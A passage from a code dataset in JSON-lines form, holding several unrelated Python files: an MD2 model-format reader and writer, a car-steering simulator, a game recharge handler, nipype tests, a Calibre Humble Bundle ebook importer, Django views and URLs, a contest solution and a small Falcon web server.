0.262866),\n (0.809017, -0.309017, 0.500000),\n (0.681718, -0.147621, 0.716567),\n (0.850651, 0.000000, 0.525731),\n (0.864188, 0.442863, -0.238856),\n (0.809017, 0.309017, -0.500000),\n (0.951056, 0.162460, -0.262866),\n (0.525731, 0.000000, -0.850651),\n (0.681718, 0.147621, -0.716567),\n (0.681718, -0.147621, -0.716567),\n (0.850651, 0.000000, -0.525731),\n (0.809017, -0.309017, -0.500000),\n (0.864188, -0.442863, -0.238856),\n (0.951056, -0.162460, -0.262866),\n (0.147621, 0.716567, -0.681718),\n (0.309017, 0.500000, -0.809017),\n (0.425325, 0.688191, -0.587785),\n (0.442863, 0.238856, -0.864188),\n (0.587785, 0.425325, -0.688191),\n (0.688191, 0.587785, -0.425325),\n (-0.147621, 0.716567, -0.681718),\n (-0.309017, 0.500000, -0.809017),\n (0.000000, 0.525731, -0.850651),\n (-0.525731, 0.000000, -0.850651),\n (-0.442863, 0.238856, -0.864188),\n (-0.295242, 0.000000, -0.955423),\n (-0.162460, 0.262866, -0.951056),\n (0.000000, 0.000000, -1.000000),\n (0.295242, 0.000000, -0.955423),\n (0.162460, 0.262866, -0.951056),\n (-0.442863, -0.238856, -0.864188),\n (-0.309017, -0.500000, -0.809017),\n (-0.162460, -0.262866, -0.951056),\n (0.000000, -0.850651, -0.525731),\n (-0.147621, -0.716567, -0.681718),\n (0.147621, -0.716567, -0.681718),\n (0.000000, -0.525731, -0.850651),\n (0.309017, -0.500000, -0.809017),\n (0.442863, -0.238856, -0.864188),\n (0.162460, -0.262866, -0.951056),\n (0.238856, -0.864188, -0.442863),\n (0.500000, -0.809017, -0.309017),\n (0.425325, -0.688191, -0.587785),\n (0.716567, -0.681718, -0.147621),\n (0.688191, -0.587785, -0.425325),\n (0.587785, -0.425325, -0.688191),\n (0.000000, -0.955423, -0.295242),\n (0.000000, -1.000000, 0.000000),\n (0.262866, -0.951056, -0.162460),\n (0.000000, -0.850651, 0.525731),\n (0.000000, -0.955423, 0.295242),\n (0.238856, -0.864188, 0.442863),\n (0.262866, -0.951056, 0.162460),\n (0.500000, -0.809017, 
0.309017),\n (0.716567, -0.681718, 0.147621),\n (0.525731, -0.850651, 0.000000),\n (-0.238856, -0.864188, -0.442863),\n (-0.500000, -0.809017, -0.309017),\n (-0.262866, -0.951056, -0.162460),\n (-0.850651, -0.525731, 0.000000),\n (-0.716567, -0.681718, -0.147621),\n (-0.716567, -0.681718, 0.147621),\n (-0.525731, -0.850651, 0.000000),\n (-0.500000, -0.809017, 0.309017),\n (-0.238856, -0.864188, 0.442863),\n (-0.262866, -0.951056, 0.162460),\n (-0.864188, -0.442863, 0.238856),\n (-0.809017, -0.309017, 0.500000),\n (-0.688191, -0.587785, 0.425325),\n (-0.681718, -0.147621, 0.716567),\n (-0.442863, -0.238856, 0.864188),\n (-0.587785, -0.425325, 0.688191),\n (-0.309017, -0.500000, 0.809017),\n (-0.147621, -0.716567, 0.681718),\n (-0.425325, -0.688191, 0.587785),\n (-0.162460, -0.262866, 0.951056),\n (0.442863, -0.238856, 0.864188),\n (0.162460, -0.262866, 0.951056),\n (0.309017, -0.500000, 0.809017),\n (0.147621, -0.716567, 0.681718),\n (0.000000, -0.525731, 0.850651),\n (0.425325, -0.688191, 0.587785),\n (0.587785, -0.425325, 0.688191),\n (0.688191, -0.587785, 0.425325),\n (-0.955423, 0.295242, 0.000000),\n (-0.951056, 0.162460, 0.262866),\n (-1.000000, 0.000000, 0.000000),\n (-0.850651, 0.000000, 0.525731),\n (-0.955423, -0.295242, 0.000000),\n (-0.951056, -0.162460, 0.262866),\n (-0.864188, 0.442863, -0.238856),\n (-0.951056, 0.162460, -0.262866),\n (-0.809017, 0.309017, -0.500000),\n (-0.864188, -0.442863, -0.238856),\n (-0.951056, -0.162460, -0.262866),\n (-0.809017, -0.309017, -0.500000),\n (-0.681718, 0.147621, -0.716567),\n (-0.681718, -0.147621, -0.716567),\n (-0.850651, 0.000000, -0.525731),\n (-0.688191, 0.587785, -0.425325),\n (-0.587785, 0.425325, -0.688191),\n (-0.425325, 0.688191, -0.587785),\n (-0.425325, -0.688191, -0.587785),\n (-0.587785, -0.425325, -0.688191),\n (-0.688191, -0.587785, -0.425325)\n)\n\n\nclass Header:\n \"\"\"Class for representing a Md2 file header\"\"\"\n format = \"<4s16i\"\n size = struct.calcsize(format)\n\n def __init__(self,\n identity,\n version,\n skin_width,\n skin_height,\n frame_size,\n number_of_skins,\n number_of_vertexes,\n number_of_st_vertexes,\n number_of_triangles,\n number_of_gl_commands,\n number_of_frames,\n skin_offset,\n st_vertex_offset,\n triangle_offset,\n frame_offset,\n gl_command_offset,\n end_offset):\n\n self.identity = identity\n self.version = version\n self.skin_width = skin_width\n self.skin_height = skin_height\n self.frame_size = frame_size\n self.number_of_skins = number_of_skins\n self.number_of_vertexes = number_of_vertexes\n self.number_of_st_vertexes = number_of_st_vertexes\n self.number_of_triangles = number_of_triangles\n self.number_of_gl_commands = number_of_gl_commands\n self.number_of_frames = number_of_frames\n self.skin_offset = skin_offset\n self.st_vertex_offset = st_vertex_offset\n self.triangle_offset = triangle_offset\n self.frame_offset = frame_offset\n self.gl_command_offset = gl_command_offset\n self.end_offset = end_offset\n\n @classmethod\n def write(cls, file, header):\n header_data = struct.pack(cls.format,\n header.identity,\n header.version,\n header.skin_width,\n header.skin_height,\n header.frame_size,\n header.number_of_skins,\n header.number_of_vertexes,\n header.number_of_st_vertexes,\n header.number_of_triangles,\n header.number_of_gl_commands,\n header.number_of_frames,\n header.skin_offset,\n header.st_vertex_offset,\n header.triangle_offset,\n header.frame_offset,\n header.gl_command_offset,\n header.end_offset)\n\n file.write(header_data)\n\n @classmethod\n def read(cls, file):\n 
header_data = file.read(cls.size)\n header_struct = struct.unpack(cls.format, header_data)\n\n return Header(*header_struct)\n\n\nclass Skin:\n format = '<64s'\n size = struct.calcsize(format)\n\n @classmethod\n def write(cls, file, skin):\n skin_data = struct.pack(cls.format, skin.encode('ascii'))\n\n file.write(skin_data)\n\n @classmethod\n def read(cls, file):\n skin_data = file.read(cls.size)\n skin_struct = struct.unpack(cls.format, skin_data)\n\n return skin_struct[0].split(b'\\00')[0].decode('ascii')\n\n\nclass Skins:\n Class = Skin\n\n @classmethod\n def write(cls, file, skins):\n for skin in skins:\n cls.Class.write(file, skin)\n\n @classmethod\n def read(cls, file):\n return [c[0].split(b'\\00')[0].decode('ascii') for c in struct.iter_unpack(cls.Class.format, file.read())]\n\n\nclass TriVertex:\n \"\"\"Class for representing a trivertex\n\n A TriVertex is a set of XYZ coordinates and a light normal index.\n\n Note:\n The XYZ coordinates are packed into a (0, 0, 0) to (255, 255, 255)\n local space. The actual position can be calculated:\n\n position = (packed_vertex * frame.scale) + frame.translate\n\n Note:\n The light normal index is an index into a set of pre-calculated normal\n vectors. These can be found in the vertex_normals attribute of this\n module.\n\n Attributes:\n x: The x-coordinate\n\n y: The y-coordinate\n\n z: The z-coordinate\n\n light_normal_index: The index for the pre-calculated normal vector of\n this vertex used for lighting.\n \"\"\"\n\n format = '<4B'\n size = struct.calcsize(format)\n\n __slots__ = (\n 'x',\n 'y',\n 'z',\n 'light_normal_index'\n )\n\n def __init__(self,\n x,\n y,\n z,\n light_normal_index):\n\n self.x = x\n self.y = y\n self.z = z\n self.light_normal_index = light_normal_index\n\n def __getitem__(self, key):\n if type(key) is int:\n return [self.x, self.y, self.z][key]\n\n elif type(key) is slice:\n start = key.start or 0\n stop = key.stop or 3\n\n return [self.x, self.y, self.z][start:stop]\n\n def __setitem__(self, key, value):\n if type(key) is int:\n if key == 0:\n self.x = value\n elif key == 1:\n self.y = value\n elif key == 2:\n self.z = value\n else:\n raise IndexError('list index out of range')\n\n elif type(key) is slice:\n start = key.start or 0\n stop = key.stop or 3\n\n for i in range(start, stop):\n self[i] = value[i]\n\n @classmethod\n def write(cls, file, tri_vertex):\n tri_vertex_data = struct.pack(cls.format,\n tri_vertex.x,\n tri_vertex.y,\n tri_vertex.z,\n tri_vertex.light_normal_index)\n\n file.write(tri_vertex_data)\n\n @classmethod\n def read(cls, file):\n tri_vertex_data = file.read(cls.size)\n tri_vertex_struct = struct.unpack(cls.format, tri_vertex_data)\n\n return TriVertex(*tri_vertex_struct)\n\n\nclass StVertex:\n \"\"\"Class for representing an st vertex\n\n StVertices are similar to UV coordinates but are expressed in terms of\n surface space and span (0,0) to (texture_width, texture_height).\n\n Note:\n If an StVertex lies on a seam and belongs to a back facing triangle,\n the s-component must be incremented by half of the skin width.\n\n Attributes:\n s: The x-coordinate on the skin.\n\n t: The y-coordinate on the skin.\n \"\"\"\n\n format = '<2h'\n size = struct.calcsize(format)\n count = 1\n\n __slots__ = (\n 's',\n 't'\n )\n\n def __init__(self,\n s,\n t):\n\n self.s = s\n self.t = t\n\n def __getitem__(self, key):\n if type(key) is int:\n return [self.s, self.t][key]\n\n elif type(key) is slice:\n start = key.start or 0\n stop = key.stop or 2\n\n return [self.s, self.t][start:stop]\n\n def 
__setitem__(self, key, value):\n if type(key) is int:\n if key == 0:\n self.s = value\n elif key == 1:\n self.t = value\n else:\n raise IndexError('list index out of range')\n\n elif type(key) is slice:\n start = key.start or 0\n stop = key.stop or 2\n\n for i in range(start, stop):\n self[i] = value[i]\n\n @classmethod\n def write(cls, file, st_vertex):\n st_vertex_data = struct.pack(cls.format,\n st_vertex.s,\n st_vertex.t)\n\n file.write(st_vertex_data)\n\n @classmethod\n def read(cls, file):\n st_vertex_data = file.read(cls.size)\n st_vertex_struct = struct.unpack(cls.format, st_vertex_data)\n\n return StVertex(*st_vertex_struct)\n\n\nclass StVertexes:\n Class = StVertex\n\n @classmethod\n def write(cls, file, st_vertexes):\n for st_vertex in st_vertexes:\n cls.Class.write(file, st_vertex)\n\n @classmethod\n def read(cls, file):\n return [cls.Class(*st) for st in struct.iter_unpack(cls.Class.format, file.read())]\n\n\nclass Triangle:\n \"\"\"Class for representing a triangle\n\n Note:\n The triangle winding direction is clockwise.\n\n Attributes:\n vertexes: A triple of vertex indexes. XYZ data can be obtained by\n indexing into the frame.vertexes attribute.\n \"\"\"\n\n format = '<6h'\n size = struct.calcsize(format)\n\n __slots__ = (\n 'vertexes',\n 'st_vertexes'\n )\n\n def __init__(self,\n vertex_0,\n vertex_1,\n vertex_2,\n st_vertex_0,\n st_vertex_1,\n st_vertex_2):\n\n self.vertexes = [vertex_0, vertex_1, vertex_2]\n self.st_vertexes = [st_vertex_0, st_vertex_1, st_vertex_2]\n\n def __getitem__(self, key):\n return self.vertexes[key]\n\n def __setitem__(self, key, value):\n self.vertexes[key] = value\n\n @classmethod\n def write(cls, file, triangle):\n triangle_data = struct.pack(cls.format,\n *triangle.vertexes,\n *triangle.st_vertexes)\n\n file.write(triangle_data)\n\n @classmethod\n def read(cls, file):\n triangle_data = file.read(cls.size)\n triangle_struct = struct.unpack(cls.format, triangle_data)\n\n return Triangle(*triangle_struct)\n\n\nclass Triangles:\n Class = Triangle\n\n @classmethod\n def write(cls, file, triangles):\n for triangle in triangles:\n cls.Class.write(file, triangle)\n\n @classmethod\n def read(cls, file):\n return [cls.Class(*c) for c in struct.iter_unpack(cls.Class.format, file.read())]\n\n\nclass Frame:\n \"\"\"Class for representing a frame\n\n A Frame is an object that represents the state of the model at a single\n frame of animation.\n\n Attributes:\n scale: The frame scale\n\n translate: The frame offset\n\n name: The name of the frame.\n\n vertexes: A list of TriVertex objects.\n \"\"\"\n\n format = '<6f16s'\n size = struct.calcsize(format)\n\n __slots__ = (\n 'scale',\n 'translate',\n 'name',\n 'vertexes'\n )\n\n def __init__(self,\n scale_x,\n scale_y,\n scale_z,\n translate_x,\n translate_y,\n translate_z,\n name):\n\n self.scale = scale_x, scale_y, scale_z\n self.translate = translate_x, translate_y, translate_z\n self.name = name\n\n if type(name) is bytes:\n self.name = name.split(b'\\00')[0].decode('ascii')\n\n self.vertexes = []\n\n @classmethod\n def write(cls, file, frame):\n frame_data = struct.pack(cls.format,\n *frame.scale,\n *frame.translate,\n frame.name.encode('ascii'))\n\n file.write(frame_data)\n\n for vertex in frame.vertexes:\n TriVertex.write(file, vertex)\n\n @classmethod\n def read(cls, file, number_of_vertexes):\n frame_data = file.read(cls.size)\n frame_struct = struct.unpack(cls.format, frame_data)\n\n frame = Frame(*frame_struct)\n frame.vertexes = [TriVertex.read(file) for _ in range(number_of_vertexes)]\n\n return 
frame\n\n\nclass GlVertex:\n format = '<2fi'\n size = struct.calcsize(format)\n\n __slots__ = (\n 's',\n 't',\n 'vertex'\n )\n\n def __init__(self,\n s,\n t,\n vertex):\n\n self.s = s\n self.t = t\n self.vertex = vertex\n\n @classmethod\n def write(cls, file, gl_vertex):\n gl_vertex_data = struct.pack(cls.format,\n gl_vertex.s,\n gl_vertex.t,\n gl_vertex.vertex)\n\n file.write(gl_vertex_data)\n\n @classmethod\n def read(cls, file):\n gl_vertex_data = file.read(cls.size)\n gl_vertex_struct = struct.unpack(cls.format, gl_vertex_data)\n\n return GlVertex(*gl_vertex_struct)\n\n\nTRIANGLE_STRIP = 1\nTRIANGLE_FAN = -1\n\n\nclass GlCommand:\n __slots__ = (\n 'mode',\n 'vertexes'\n )\n\n def __init__(self, mode):\n self.mode = mode\n\n @classmethod\n def write(cls, file, gl_command):\n vertex_count = len(gl_command.vertexes) * gl_command.mode\n vertex_count_data = struct.pack(' self.distance_limit or abs(self.angle) > self.angle_limit:\n self._add_penalty()\n frame = self._pipeline(img=frame, tx=0, ry=0)\n return frame, True\n\n # transform current frame\n # simulated_frame = self._pipeline(img=frame, tx=self.distance, ry=self.angle)\n\n # compute wheel angle and radius of the real car\n steer = eps if abs(steer) < eps else steer\n wheel_angle = steering.get_delta_from_steer(steer)\n R = steering.get_radius_from_delta(wheel_angle)\n\n # check is the simulated car is after circle's center\n # can't be simulated\n if self.distance > R > 0 or self.distance < R < 0:\n self._add_penalty()\n frame = self._pipeline(img=frame, tx=0, ry=0)\n print(\"Some circle check\")\n return frame, True\n\n # estimate position of the real car\n # the condition is to avoid dividing by zero when computing Bx,\n # thus Bx1 != Bx2 always\n alpha = velocity * delta_time / R\n assert -math.pi < alpha < math.pi, \"Turns bigger than 180 are not allowed\"\n\n if abs(alpha - math.pi / 2) < eps:\n alpha = math.pi / 2 - eps\n x = R * (1 - np.cos(alpha))\n y = R * np.sin(alpha)\n\n # compute line from new position to the center of the circle\n p1 = np.array([x, y, 1])\n p2 = np.array([R, 0, 1])\n d1 = np.cross(p1, p2)\n d1 /= np.linalg.norm(d1[0:2])\n\n # fitler predicted steer\n # self.avg_predicted_steer = predicted_steer if sel.avg_predicted_steer is None \\\n # else .5 * self.avg_predicted_steer + 0.5 * predicted_steer\n self.avg_predicted_steer = predicted_steer\n\n # compute wheel angle and radius for simulated car\n self.avg_predicted_steer = eps if abs(self.avg_predicted_steer) < eps else self.avg_predicted_steer\n sim_wheel_angle = steering.get_delta_from_steer(self.avg_predicted_steer)\n sim_R = steering.get_radius_from_delta(sim_wheel_angle)\n\n # d2 = (a, b, c), where a * x + b * y + c = 0 with the above params\n # line perpendicular to car's orientation that passes through (distance, 0)\n d2 = np.zeros((3,))\n d2[0] = np.sin(self.angle)\n d2[1] = np.cos(self.angle)\n d2[2] = -d2[0] * self.distance\n\n # compute circle center (Cx, Cy) with radius sim_R that passes through (distance, 0)\n # we have the system\n # d2[0] * Cx + d2[1] * Cy + d[2] = 0\n # (Cx - cumulative_distance)**2 + Cy**2 = sim_R**2\n # from the first equation, and due to the fact that maximum angle is 90, we can divide by d2[1]\n # Cy = -d[0]/d[1] * Cx - d[2]/d[1]\n # using notation with m & n\n # Cy = m * Cx + n\n m = -d2[0] / d2[1]\n n = -d2[2] / d2[1]\n\n # substituting in the second equation\n # (Cx - cumulative_d)**2 + (m * Cx + n)**2 = sim_R**2\n # we obtain the quadratic equation\n # (m**2 + 1) * Cx**2 + (-2cumulative_d + 2mn) * Cx + 
(cumulative_d**2 + n**2 - sim_R**2) = 0\n        a = m ** 2 + 1\n        b = 2 * (m * n - self.distance)\n        c = n ** 2 + self.distance ** 2 - sim_R ** 2\n\n        discriminant = b ** 2 - 4 * a * c\n        Cx1 = (-b + np.sqrt(discriminant)) / (2 * a)\n        Cx2 = (-b - np.sqrt(discriminant)) / (2 * a)\n\n        Cx = max(Cx1, Cx2) if sim_wheel_angle >= 0 else min(Cx1, Cx2)\n        Cy = m * Cx + n\n\n        # compute the new position of the car, (Bx, By)\n        # we constrain (Bx, By) to be on the d1 line\n        # so we compute the intersection of the line d1 with the circle ((Cx, Cy), sim_R)\n        a = d1[0] ** 2 + d1[1] ** 2\n        b = -2 * d1[1] ** 2 * Cx + 2 * d1[0] * (d1[2] + d1[1] * Cy)\n        c = d1[1] ** 2 * Cx ** 2 + (d1[2] + d1[1] * Cy) ** 2 - d1[1] ** 2 * sim_R ** 2\n        discriminant = b ** 2 - 4 * a * c\n\n        # check if no solution\n        if discriminant < 0:\n            # this means no solution, car is behind\n            self._add_penalty()\n            return frame, True\n\n        Bx1 = (-b + np.sqrt(discriminant)) / (2 * a)\n        Bx2 = (-b - np.sqrt(discriminant)) / (2 * a)\n        sgn_R = 1 if R >= 0 else -1\n        turn_sgn = 1 if sgn_R * (x - R) < 0 else -1\n\n        # this formula holds if the car makes a turn smaller than 90 degrees (turn_sgn = 1)\n        # and bigger than 90 degrees (turn_sgn = -1)\n        Bx = turn_sgn * min(turn_sgn * Bx1, turn_sgn * Bx2) \\\n            if sim_wheel_angle > 0 else turn_sgn * max(turn_sgn * Bx1, turn_sgn * Bx2)\n        By = (-d1[0] * Bx - d1[2]) / d1[1]\n\n        # update distance\n        sgn = 1 if np.cross(np.array([Bx, By]), np.array([x, y])) >= 0 else -1\n        self.distance = sgn * np.sqrt((Bx - x) ** 2 + (By - y) ** 2)\n\n        # update cumulative angle\n        # vector from the center to the new position <Bx - Cx, By - Cy>\n        # vector perpendicular to the one above v = <Cy - By, Bx - Cx>\n        # make it point in the positive/negative OY direction sign(Bx-Cx) * v\n        # normalize v = v / norm(v)\n        # take dot product with normal vector of d1 to get cos of angle, and arccos to get the angle\n        # angle = angle * sign(vx), v = <vx, vy>\n        v1 = np.array([Cy - By, Bx - Cx])\n        sgn = turn_sgn if v1[1] >= 0 else -turn_sgn\n        v1 = sgn * v1 / np.linalg.norm(v1)\n\n        v2 = np.array([d1[0], d1[1]])\n        sgn = turn_sgn if v2[1] >= 0 else -turn_sgn\n        v2 = sgn * v2 / np.linalg.norm(v2)\n\n        sgn = 1 if np.cross(v1, v2) >= 0 else -1\n        self.angle = sgn * np.arccos(np.clip(np.dot(v1, v2), -1, 1))\n\n        simulated_frame = self._pipeline(img=frame, tx=self.distance, ry=self.angle)\n        return simulated_frame, False\n","sub_path":"simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":10088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"476628162","text":"# -*- coding:utf-8 -*-\n\"\"\"\ncreated by server on 15-2-11下午3:49.\n\"\"\"\nfrom gfirefly.server.globalobject import remoteserviceHandle\nfrom gfirefly.server.logobj import logger\nfrom app.proto_file.common_pb2 import GetGoldResponse\nfrom app.proto_file.game_pb2 import GameLoginRequest\nfrom shared.db_opear.configs_data import game_configs\n\n\n@remoteserviceHandle('gate')\ndef get_gold_2001(data, player):\n    \"\"\"客户端充值完成后,获取充值币信息\"\"\"\n    request = GameLoginRequest()\n    request.ParseFromString(data)\n    pay_arg = dict(openkey=request.open_key,\n                   pay_token=request.pay_token,\n                   pf=request.pf,\n                   pfkey=request.pfkey)\n    response = GetGoldResponse()\n    player.pay.refresh_pay_arg(pay_arg)  # 设置支付参数\n\n    logger.debug(\"recharge_id %s\" % request.recharge_id)\n    # add 月卡\n    recharge_item = game_configs.recharge_config.get(request.recharge_id)\n    if recharge_item is None:\n        logger.debug('not in rechargeconfig:%s', data.get('productId'))\n    else:\n        player.recharge.recharge_gain(recharge_item, 
response, 5,\n True) # 发送奖励邮件\n    response.res.result = True\n\n    player.pay.recharge()\n    response.res.result = True\n    player.recharge.get_recharge_response(response)\n    logger.debug(\"get_gold_2001============%s\" % response)\n    return response.SerializeToString()\n","sub_path":"app/game/action/node/sdk_tencent.py","file_name":"sdk_tencent.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"146665355","text":"import nipype\n\nfrom ..template import (define_template_workflow,\n                        TemplateInput,\n                        AnatomicalSegmentation,\n                        TemplateReport)\n\n\nclass TestTemplateWorkflow(object):\n\n    def test_template_workflow_creation(self, lyman_info):\n\n        proj_info = lyman_info[\"proj_info\"]\n        subjects = lyman_info[\"subjects\"]\n\n        wf = define_template_workflow(\n            proj_info, subjects\n        )\n\n        # Check basic information about the workflow\n        assert isinstance(wf, nipype.Workflow)\n        assert wf.name == \"template\"\n        assert wf.base_dir == proj_info.cache_dir\n\n        # Check root directory of output\n        template_out = wf.get_node(\"template_output\")\n        assert template_out.inputs.base_directory == proj_info.proc_dir\n\n        # Check the list of nodes we expect\n        expected_nodes = [\"subject_source\", \"template_input\",\n                          \"crop_image\", \"zoom_image\", \"reorient_image\",\n                          \"generate_reg\", \"invert_reg\",\n                          \"transform_wmparc\", \"anat_segment\",\n                          \"hemi_source\", \"tag_surf\", \"combine_hemis\",\n                          \"template_qc\", \"template_output\"]\n        expected_nodes.sort()\n        assert wf.list_node_names() == expected_nodes\n\n        # Check iterables\n        subject_source = wf.get_node(\"subject_source\")\n        assert subject_source.iterables == (\"subject\", subjects)\n\n    def test_template_input(self, freesurfer):\n\n        out = TemplateInput(\n            data_dir=freesurfer[\"data_dir\"],\n            subject=freesurfer[\"subject\"]\n        ).run().outputs\n\n        assert out.norm_file == freesurfer[\"norm_file\"]\n        assert out.wmparc_file == freesurfer[\"wmparc_file\"]\n\n        output_path = \"{}/template\".format(freesurfer[\"subject\"])\n        assert out.output_path == output_path\n\n    def test_anatomical_segmentation(self, execdir, freesurfer):\n\n        out = AnatomicalSegmentation(\n            wmparc_file=freesurfer[\"wmparc_file\"],\n        ).run().outputs\n\n        assert out.seg_file == execdir.join(\"seg.nii.gz\")\n        assert out.mask_file == execdir.join(\"mask.nii.gz\")\n\n    def test_template_report(self, execdir, template):\n\n        out = TemplateReport(\n            seg_file=template[\"seg_file\"],\n            mask_file=template[\"mask_file\"],\n            surf_file=template[\"surf_file\"],\n            anat_file=template[\"anat_file\"],\n        ).run().outputs\n\n        assert out.seg_plot == execdir.join(\"seg.png\")\n        assert out.mask_plot == execdir.join(\"mask.png\")\n        assert out.surf_plot == execdir.join(\"surf.png\")\n        assert out.anat_plot == execdir.join(\"anat.png\")\n","sub_path":"lyman/workflows/tests/test_template.py","file_name":"test_template.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"298490305","text":"s=sorted(map(int, input().strip().split()))\na,b,c=map(lambda s:s**2, s)\nif s[0]+s[1]<=s[2]:\n    print('Not triangle')\nelse:\n    if a+b<c:\n        print('Obtuse triangle')\n    elif a+b>c:\n        print('Acute triangle')\n    else:\n        print('Right triangle')\n\n    if (a==b or b==c):\n        print('Isosceles triangle')\n    if a==c:\n        print('Equilateral 
triangle')\n\n\n\n","sub_path":"Oj_Problem/others/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222099985","text":"#!/usr/bin/env python2 \n\n__license__ = 'MIT'\n__copyright__ = '2018, bd-ober '\n__docformat__ = 'restructuredtext en'\n\nfrom PyQt5.Qt import QRunnable, QObject, pyqtSlot, pyqtSignal\n\nfrom calibre_plugins.hb_downloader.hb_downloader.humble_api.humble_api import HumbleApi\nfrom calibre_plugins.hb_downloader.hb_downloader.humble_download import HumbleDownload\nfrom calibre_plugins.hb_downloader.hb_downloader.config_data import ConfigData\n\nfrom calibre.gui2.dialogs.progress import ProgressDialog\n\nclass importerSignals(QObject):\n \n log = pyqtSignal(str)\n done_downloads = pyqtSignal(list)\n\n\n\nclass importer(QRunnable):\n \n def __init__(self, db, auth_token, dl_loc):\n super(importer, self).__init__()\n \n self.db = db\n self.auth_token = auth_token\n self.dl_loc = dl_loc\n \n self.download_names = []\n \n self.signals = importerSignals()\n \n self.pd = ProgressDialog(_('Fetching books...'),\n _('Connecting to Humble Bundle...'),\n min=0, max=0,\n icon='images/icon.png'\n )\n \n \n @pyqtSlot()\n def run(self):\n self.pd.show()\n \n # Identify any existing books with humblebundle tag\n existing_hb_filenames = self.db.all_field_names('#humble_filenames')\n self.signals.log.emit(str(len(existing_hb_filenames)) + ' existing books from Humble Bundle identified.')\n \n # Attempt to authenticate\n hapi = HumbleApi(self.auth_token)\n ConfigData.download_location = self.dl_loc\n \n if hapi.check_login():\n self.signals.log.emit('Authentication successful...')\n else:\n self.signals.log.emit('Unable to login - check authentication token.')\n self.done()\n \n # Get orders\n game_keys = hapi.get_gamekeys()\n self.signals.log.emit('%s orders/keys found...' % (len(game_keys)))\n \n key_downloads = dict()\n \n # Get relevant downloads\n num_books_found = 0\n num_new_books = 0\n for key in game_keys:\n humble_downloads = []\n order = hapi.get_order(key)\n \n for subproduct in order.subproducts or []:\n for download in subproduct.downloads or []:\n # Check platform\n if download.platform != 'ebook':\n continue\n \n for dl_struct in download.download_structs:\n num_books_found += 1\n \n # Check filename\n if dl_struct.filename in existing_hb_filenames:\n continue\n \n self.download_names.append(dl_struct.filename)\n humble_downloads.append( HumbleDownload(download, dl_struct, order, subproduct, key) )\n num_new_books += 1\n \n key_downloads[key] = humble_downloads\n \n self.signals.log.emit('(%s/%s) books found do not already exist in Calibre...' % (num_new_books, num_books_found) )\n\n \n ticker = 0\n for key in key_downloads:\n # Update URL in case of expiry\n HumbleDownload.update_download_list_url(hapi, key_downloads.get(key))\n \n for hd in key_downloads.get(key):\n ticker += 1\n if self.pd.canceled:\n self.signals.log.emit('Downloads aborted.')\n self.pd.close()\n self.pd.deleteLater()\n return\n \n self.pd.msg = '(%s/%s) Downloading %s ...' 
% (ticker, num_new_books, hd.filename)\n hd.download_file()\n \n self.done()\n\n\n def done(self):\n self.signals.done_downloads.emit(self.download_names)\n self.signals.log.emit('Downloads complete.')\n \n self.pd.close()\n self.pd.deleteLater()\n","sub_path":"importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"242334099","text":"from django.conf.urls import url\n\nfrom . import views\n\n\napp_name = 'post'\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='home'),\n url(r'^show', views.ShowView.as_view(), name='showlist'),\n url(r'^enter', views.EnterResolution.as_view(), name='enter'),\n url(r'^register', views.register, name='register'),\n url(r'^login/', views.user_login, name='login'),\n url(r'^logout/', views.user_logout, name='logout'),\n ]\n\n\n","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"471584775","text":"from itertools import accumulate\nN,K = map(int, input().split())\nS = list(map(int, input()))\n\ngroups = list()\nnow = 1\ncnt = 0\n\nfor s in S:\n if s == now:\n cnt += 1\n else:\n groups.append(cnt)\n now ^= 1\n cnt = 1\n\ngroups.append(cnt)\n\nif len(groups) % 2 == 0:\n groups.append(0)\n\ncumsum = [0] + list(accumulate(groups))\n\nAdd = 2 * K + 1\n\nans = 0\n\nfor i in range(0,len(groups), 2):\n left = i\n right = min(i + Add, len(groups))\n tmp = cumsum[right] - cumsum[left]\n\n ans = max(tmp,ans)\n\nprint(ans)\n","sub_path":"atcoder/ABC/124/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"470284542","text":"from wsgiref.simple_server import make_server\n\nimport falcon\nimport json\nimport cv2\nimport os\nimport numpy as np\nimport utils\n\nPORT = 7777\nINPUT_VIDEO_FPATH = 'data/2018-02-2715_03_24.ogv'\n\nhtml_body_template = '''\n\nMug Detector\n\n\n%s\n\n'''\n\nclass MugResource:\n def on_get(self, req, resp):\n print(f'Ensuring {INPUT_VIDEO_FPATH} was processed...')\n utils.ensure_video_precessed(INPUT_VIDEO_FPATH)\n \n resp.content_type = 'text/html'\n images, captions = utils.get_switches(INPUT_VIDEO_FPATH)\n images_with_captions = \"\"\n for im, cap in zip(images, captions):\n images_with_captions += f\"\"\"

\"{cap}\"

\n \"\"\"\n resp.body = html_body_template % images_with_captions\n resp.status = falcon.HTTP_200\n\ndef get_app():\n app = falcon.API()\n app.add_route('/', MugResource())\n app.add_static_route('/image', os.path.abspath('./') + '/')\n return app\n\napp = get_app()\n\nif __name__ == '__main__':\n with make_server('', PORT, app) as httpd:\n print(f'Serving on port {PORT}...')\n httpd.serve_forever()\n","sub_path":"app/mug_server.py","file_name":"mug_server.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"334507013","text":"from django.shortcuts import render\nfrom apps.tienda.models import Product\n# Create your views here.\n\n\ndef home(request):\n products = Product.objects.all().filter(\n is_available=True).order_by('-id')[:12]\n context = {\n 'products': products,\n }\n return render(request, 'home.html', context)\n","sub_path":"musicpro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"564332602","text":"\nimport 